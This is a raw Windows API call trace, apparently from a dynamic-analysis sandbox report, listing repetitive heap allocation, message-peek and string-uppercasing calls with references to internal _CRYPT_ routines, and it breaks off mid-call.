[0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0136.847] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0136.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0136.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0136.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0136.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0136.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0136.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.849] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0136.849] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0136.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0136.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0136.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0136.850] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0136.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0136.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0136.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0136.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0136.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0136.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0136.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0136.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0136.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0136.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0136.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0136.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0136.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0136.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0136.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0136.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0136.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.854] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0136.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0136.854] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0136.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0136.855] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0136.855] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0136.855] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0136.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0136.855] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0136.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.855] HeapFree (in: hHeap=0x970000, 